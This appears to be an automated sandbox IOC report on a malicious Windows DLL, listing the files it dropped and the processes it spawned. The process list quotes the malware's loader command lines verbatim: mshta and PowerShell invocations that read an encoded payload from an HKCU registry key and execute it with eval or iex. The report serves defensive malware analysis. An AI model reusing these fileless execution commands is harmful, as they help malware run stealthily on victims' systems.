IOC Report

loading gif

Files

File Path
Type
Category
Malicious
uT9rwkGATJ.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
clean
C:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP
MSVC .res
dropped
clean
C:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP
MSVC .res
dropped
clean
C:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP
MSVC .res
dropped
clean
C:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP
MSVC .res
dropped
clean
C:\Users\user\AppData\Local\Temp\RES9EC1.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Temp\RESB12F.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Temp\RESB287.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Temp\RESC95B.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1h2althh.jtq.psm1
very short file (no magic)
dropped
clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31fsqk4c.qy5.psm1
very short file (no magic)
dropped
clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5szhzhvw.zcn.ps1
very short file (no magic)
dropped
clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uz4s1q2p.5j2.ps1
very short file (no magic)
dropped
clean
C:\Users\user\AppData\Local\Temp\ebytp2em.0.cs
UTF-8 Unicode (with BOM) text
dropped
clean
C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
dropped
clean
C:\Users\user\AppData\Local\Temp\ebytp2em.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
clean
C:\Users\user\AppData\Local\Temp\ebytp2em.out
ASCII text, with CRLF, CR line terminators
modified
clean
C:\Users\user\AppData\Local\Temp\hiiw3gsl.0.cs
UTF-8 Unicode (with BOM) text
dropped
clean
C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
dropped
clean
C:\Users\user\AppData\Local\Temp\hiiw3gsl.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
clean
C:\Users\user\AppData\Local\Temp\hiiw3gsl.out
ASCII text, with CRLF, CR line terminators
modified
clean
C:\Users\user\AppData\Local\Temp\hjljqxud.0.cs
UTF-8 Unicode (with BOM) text
dropped
clean
C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
dropped
clean
C:\Users\user\AppData\Local\Temp\hjljqxud.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
clean
C:\Users\user\AppData\Local\Temp\hjljqxud.out
ASCII text, with CRLF, CR line terminators
modified
clean
C:\Users\user\AppData\Local\Temp\uio4qdnj.0.cs
UTF-8 Unicode (with BOM) text
dropped
clean
C:\Users\user\AppData\Local\Temp\uio4qdnj.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
clean
C:\Users\user\AppData\Local\Temp\uio4qdnj.out
ASCII text, with CRLF, CR line terminators
modified
clean
C:\Users\user\Documents\20211008\PowerShell_transcript.830021.xU5QnXMG.20211008064622.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
clean
C:\Users\user\Documents\20211008\PowerShell_transcript.830021.xd8ptVim.20211008064618.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
clean
There are 23 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\loaddll32.exe
loaddll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
malicious
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
malicious
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny
malicious
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
malicious
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget
malicious
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance
malicious
C:\Windows\System32\mshta.exe
'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
malicious
C:\Windows\System32\mshta.exe
'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
malicious